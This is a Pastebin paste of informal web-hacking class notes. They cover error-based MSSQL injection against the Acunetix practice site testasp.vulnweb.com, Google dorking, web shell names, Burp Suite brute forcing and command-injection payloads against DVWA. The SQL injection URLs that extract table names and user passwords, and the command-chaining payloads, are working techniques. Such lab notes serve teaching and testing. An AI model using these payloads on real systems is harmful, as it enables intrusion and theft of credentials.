API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jan 8th, 2018
298
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.44 KB | None | 0 0
raw download clone embed print report
  1. 1. Error Based Injection
  2. 2. ---------------------
  3. 3. Error Based Injection is a part of SQL Injection attacks series in which we will try to exploit web applications designed in ASP or ASPX and running on IIS Server with MS-SQL Database systems.
  4. 4.  
  5. 5. Problems in Error Based Injection
  6. 6. ---------------------------------
  7. 7. 1. Like PHP hacking into ASP and ASPX sites needs a different ball game as the database queries are pretty different in MS SQL as compare to MySQL.
  8. 8. 2. Database() and Version() will not be executed on the MSSQL.
  9. 9. 3. Order by clause will not work on MS-SQL.
  10. 10. 4. Union will also not work.
  11. 11. 5. It works on LIFO(Last in First Out) rule, i.e you cannot get the entire table list from information_Schema.tables hence you have to get one table at a time.
  12. 12.  
  13. 13. Why it is known as Error Based Injection
  14. 14. -----------------------------------------
  15. 15. It means you will get the data in an error.
  16. 16.  
  17. 17. Target : vulnweb.com : It is practice framework from a company called Acunetix.
  18. 18.  
  19. 19. It has all MY-SQL and MS-SQL technology attack practices.
  20. 20.  
  21. 21. Step 1: Get any GET method in the URL of the website. I.e We have to look for any SOmethoing=Something.
  22. 22. http://testasp.vulnweb.com/showforum.asp?id=0
  23. 23.  
  24. 24. Step 2: Check the exception handling.
  25. 25. http://testasp.vulnweb.com/showforum.asp?id=0'
  26. 26.  
  27. 27. Step 3: Check the conditions required for further attack.
  28. 28. http://testasp.vulnweb.com/showforum.asp?id=0 and 1=1;
  29. 29.  
  30. 30. NOte : Error Based Injection works on LIFO rule. Last in First out.
  31. 31.  
  32. 32. For Example: If we have a database with tables like followings
  33. 33. threads -> 1
  34. 34. teacher->2
  35. 35. classes->3
  36. 36. fee->4
  37. 37. users->5
  38. 38.  
  39. 39. Step 4: http://testasp.vulnweb.com/showforum.asp?id=0 and
  40. 40. 1=convert(int,(select top 1 table_name from information_schema.tables));
  41. 41.  
  42. 42. Step 5: Get the next tOp table in teh list
  43. 43. testasp.vulnweb.com/showforum.asp?id=0 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('threads','users')));
  44. 44.  
  45. 45. Target Table: Found : users
  46. 46.  
  47. 47. Step 6: Get the columns of the users table
  48. 48. testasp.vulnweb.com/showforum.asp?id=0 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='users' and column_name not in('uname')));
  49. 49.  
  50. 50. Column First Found : uname
  51. 51.  
  52. 52. Step 7 :Get Second Column
  53. 53. testasp.vulnweb.com/showforum.asp?id=0 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='users' and column_name not in ('uname')));
  54. 54.  
  55. 55. Step 8: Get the uname and upass
  56. 56. http://testasp.vulnweb.com/showforum.asp?id=0 and 1=convert(int,(select top 1 upass from users));
  57. 57.  
  58. 58.  
  59. 59.  
  60. 60. Google Dorks
  61. 61. ------------
  62. 62. Google Dorks are the techniques of refine searching on Google and other page rank algorithm based search engines. Where we try to refine our searching results with some non traditional approach inputs in search input field.
  63. 63.  
  64. 64. Three main aspects of any google result.
  65. 65.  
  66. 66. Green : URL
  67. 67.  
  68. 68. Black : Content
  69. 69.  
  70. 70. Blue  : Header
  71. 71.  
  72. 72. inurl : THis doc will concentrate only and only on the URLs available in the indexing circle of Google.
  73. 73. For Example: inurl:login.asp
  74. 74.  
  75. 75. Site: This dork will help you to scan only and only the content of the site which you will palce infront of this dork
  76. 76. For Example: site:lucideus.com
  77. 77.  
  78. 78. Filetype: This dork will help you to find a particular extension based file or application can be documnet, pdf, executable or video etc.
  79. 79. For Example: site:pokemon filetype:sql
  80. 80.  
  81. 81. indexof : This dork will lead to the open directories which host the content on the server uploaded by the admin or the users of the website.
  82. 82.  
  83. 83. For Example: indexof: download/books/osho/
  84. 84.  
  85. 85. Source: https://www.exploit-db.com/google-hacking-database/
  86.  
  87. 1. Post Parameter Injections:
  88. 2.  
  89. 3. Post Packet:
  90. 4.  
  91. 5. Packet which are containing sensitive information, through the back end of the browser, without showing anything in url.
  92. 6. This information are carried out in POST_DATA form.
  93. 7.  
  94. 8.  
  95. 9. upload:
  96. 10.  
  97. 11. CV
  98. 12. Resume,
  99. 13. Songs
  100. 14. Video
  101. 15.  
  102. 16. PAyment Gateways..
  103. 17.  
  104. 18. GET:
  105. 19.  
  106. 20. something =something
  107. 21.  
  108. 22. ============
  109. 23.  
  110. 24. Tamper Data:
  111. 25.  
  112. 26. Firefox - Addon
  113. 27.  
  114. 28. This is used to capture packets which is flowing towards any server through POST_DATA packets. It works at very end point of browser before data travel toards server.
  115. 29.  
  116. 30.  
  117. 31. Arbitary File: | Hackers Control Panel
  118. 32.  
  119. 33. This is well coded file by hacker in such a way that when this got executed over some server once this uploaded, will provide u complete access of that server.
  120. 34.  
  121. 35. This is also shell file.
  122. 36. Hacker used this method for defacing websites.
  123. 37.  
  124. 38. Extreme Acccess
  125. 39.  
  126. 40. php : C99.php, b374k.php, kikokaka.php, wsoshell.php
  127. 41. asp
  128.  
  129. 1. Brute Forcing:
  130. 2.  
  131. 3. This is a way of finding credentials for some login/authentication by try permutations and combination of words
  132. 4.  
  133. 5. Burpsuite:
  134. 6.  
  135. 7. Portswigger:
  136. 8.  
  137. 9. Free - Trial 14
  138. 10.  
  139. 11. Paid: 349 $
  140. 12.  
  141. 13. This is a java based tool (.jar), to execute, your system should be having java installed. jdk
  142. 14.  
  143. 15. Username:
  144. 16. Administrator
  145. 17. Testing
  146. 18. hello
  147. 19. lucideus
  148. 20. security
  149. 21. abc
  150. 22. admin
  151. 23. palvinder
  152. 24. hardik
  153. 25. birthday
  154. 26. chlaak
  155. 27.  
  156. 28.  
  157. 29. Password:
  158. 30. 123
  159. 31. testing
  160. 32. admin
  161. 33. abc123
  162. 34. hello
  163. 35. nai
  164. 36. btana
  165. 37. password
  166. 38.  
  167. 39.  
  168. 40. BruteForcing DVWA -> Burp Suite
  169. 41. ===============================
  170. 42.  
  171. 43. Step 1: Open Fresh Link Over which u want to brute force:
  172. 44.  
  173. 45. Step 2: Browser Setting -> Advanced -> Network -> Setting
  174. 46.  
  175. 47. Step 3: Manual Proxy Conf. -> 127.0.0.1 Port 8080
  176. 48.  
  177. 49. Note :  Remove all detail for "No Proxy for"
  178. 50.  
  179. 51. Step 4: Open Burpsuite: Proxy -> Intercept ->  Intercept is ON
  180. 52.  
  181. 53. Step 5: DVWA -> Login with Random detail
  182. 54.  
  183. 55. Step 6: Burpsuite will capture random detai packet
  184. 56.  
  185. 57. Step 7: Select packet -> right click -> Send to intruder
  186. 58.  
  187. 59. Step 8: Intercept is OFF
  188. 60.  
  189. 61. Step 9: Go to intruder -> Position -> Clear
  190. 62.  
  191. 63. Step 10: select value of username -> Add
  192. 64.  
  193. 65. Step 11: select value of paassword -> Add
  194. 66.  
  195. 67. Step 12: Attack Type: Cluster BOMB
  196. 68.  
  197. 69. Step 13: PAYLOAD -> 1 (Add value to try on Username)
  198. 70.  
  199. 71. Step 14: PAYLOAD -> 2 (Add value to try on Password)
  200. 72.  
  201. 73. Step 15: Tab -> Options -> Grep Match -> clear -> add -> Username and/or password incorrect.
  202. 74.  
  203. 75. Step 16: Start Attack
  204. 76.  
  205. 77. =============================================
  206. 78.  
  207. 79. Command Execution Vulnerability:
  208. 80. -------------------------------
  209. 81.  
  210. 82. If any site is providing u facility of function like ping, tracert, etc,
  211. 83. there we can try for such vulnerability, or any cmd function
  212. 84.  
  213. 85. DVWA: Level - Low
  214. 86.  
  215. 87. union -> merging two queries
  216. 88.  
  217. 89. cmd -> &&
  218. 90.  
  219. 91. ping 172.16.3.2 && ping www.google.com
  220. 92.  
  221. 93.  
  222. 94. Medium:
  223. 95.  
  224. 96. && -> Remove
  225. 97. ; -> Remove
  226. 98.  
  227. 99. ping 172.16.3.2 &;& ping www.google.com
  228. 100.  
  229. 101.  
  230. 102. File Execution Vulnerability
  231. 103. ---------------------------
  232. 104.  
  233. 105. www.bank.com/video.php?include=www.youtube.com/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!